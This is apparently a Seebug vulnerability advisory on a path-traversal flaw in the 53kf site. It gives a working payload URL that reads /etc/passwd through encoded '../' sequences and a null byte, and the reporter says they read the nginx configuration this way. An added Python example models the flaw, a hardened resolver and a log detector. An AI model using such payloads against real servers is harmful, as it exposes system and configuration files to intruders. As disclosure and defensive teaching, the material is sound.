53kf Arbitrary File Traversal Vulnerability

2015-01-19T00:00:00
ID SSV:94388
Type seebug
Reporter Root
Modified 2015-01-19T00:00:00

Description

Brief description:

I heard you guys are pretty impressive, so I'm testing the waters first.

Details:

The vulnerable URL is: http://www.53kf.com/?controller=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00login

The `controller` parameter is used to build a file path on the server. The repeated `..%2f` (URL-encoded `../`) sequences climb out of the controller directory up to the filesystem root, and the `%00` (null byte) terminates the string early, so whatever the application appends after the parameter (a file extension, for example) is discarded. The server then reads `/etc/passwd` instead of a controller file.
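The following is an added example, not code from the advisory or from 53kf: it models a PHP-style controller loader that concatenates the `controller` parameter into an include path, shows how the payload above resolves to `/etc/passwd` once the null byte truncates the string, and puts a hardened resolver and a simple access-log detector beside it. The web root, directory layout, suffix and log lines are assumptions constructed for the example.

```python
"""Added example (not 53kf's code). Models the traversal mechanism in the
advisory and a hardened alternative. All paths and log lines are assumed."""
import posixpath
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed layout of the vulnerable application (hypothetical values).
WEB_ROOT = "/data/www/53kf"
CONTROLLER_DIR = "controllers"
CONTROLLER_SUFFIX = ".php"

# The payload from the advisory, exactly as it appears in the query string.
PAYLOAD = "..%2f" * 16 + "etc%2fpasswd%00login"


def vulnerable_resolve(controller_param: str) -> str:
    """Mimic include($root . "/controllers/" . $_GET['controller'] . ".php").

    The web server URL-decodes the parameter, and the C-level open() behind an
    old PHP include stops at the first NUL byte, so the appended ".php" suffix
    (and anything after the NUL) is silently dropped.
    """
    decoded = unquote(controller_param)
    raw = f"{WEB_ROOT}/{CONTROLLER_DIR}/{decoded}{CONTROLLER_SUFFIX}"
    truncated = raw.split("\x00", 1)[0]          # NUL truncation, as in C
    return posixpath.normpath(truncated)         # ".." segments collapse here


# Hardened version: allowlist the name, reject NULs, and confirm the final
# path still sits inside the controller directory.
SAFE_NAME = re.compile(r"[a-z][a-z0-9_]{0,31}")


def hardened_resolve(controller_param: str) -> Optional[str]:
    decoded = unquote(controller_param)
    if "\x00" in decoded or not SAFE_NAME.fullmatch(decoded):
        return None
    base = posixpath.join(WEB_ROOT, CONTROLLER_DIR)
    candidate = posixpath.normpath(posixpath.join(base, decoded + CONTROLLER_SUFFIX))
    if not candidate.startswith(base + "/"):     # defence in depth
        return None
    return candidate


# Detection over access-log lines. These lines are constructed for the
# example; they are not real 53kf logs.
SAMPLE_ACCESS_LOG = [
    '1.2.3.4 - - [18/Jan/2015:22:19:52 +0800] "GET /?controller=login HTTP/1.1" 200 512',
    '1.2.3.4 - - [18/Jan/2015:22:20:03 +0800] "GET /?controller=' + PAYLOAD + ' HTTP/1.1" 200 1043',
    '1.2.3.4 - - [18/Jan/2015:22:38:40 +0800] "GET /?controller=..%2fconfig HTTP/1.1" 200 77',
]
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def suspicious_requests(log_lines):
    """Return (parameter name, reason) for each query value carrying a
    null byte or a '..' path segment after URL-decoding."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:                 # parse_qs has URL-decoded it
                reasons = []
                if "\x00" in value:
                    reasons.append("null byte")
                if ".." in value.replace("\\", "/").split("/"):
                    reasons.append("dot-dot segment")
                if reasons:
                    hits.append((name, ", ".join(reasons)))
    return hits


if __name__ == "__main__":
    print("vulnerable :", vulnerable_resolve(PAYLOAD))
    print("hardened   :", hardened_resolve(PAYLOAD))
    print("legit      :", hardened_resolve("login"))
    for hit in suspicious_requests(SAMPLE_ACCESS_LOG):
        print("flagged    :", hit)
```

Sixteen `../` segments are far more than the four needed to climb out of the assumed `/data/www/53kf/controllers`; attackers over-supply them because `normpath`-style resolution simply stops at `/`, so the payload works without knowing the real depth.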

Proof of concept:

[Image 53kf.jpg: https://images.seebug.org/upload/201501/18221952ee885234fcb6f3f7034345ea1e2dab5d.jpg]

I successfully guessed the path of the nginx configuration file and read it, as shown below:

[Image 53kf_nginx.jpg: https://images.seebug.org/upload/201501/182238087582c1c3b724291f746065051c138a0d.jpg]

That revealed the site's document root, so let's try reading robots.txt:

[Image 53kf_robots.jpg: https://images.seebug.org/upload/201501/18223840f163b88a2cdb40f393f64a7a4fd6e08d.jpg]

So, with the document root known and arbitrary files readable, is a source-code audit possible next?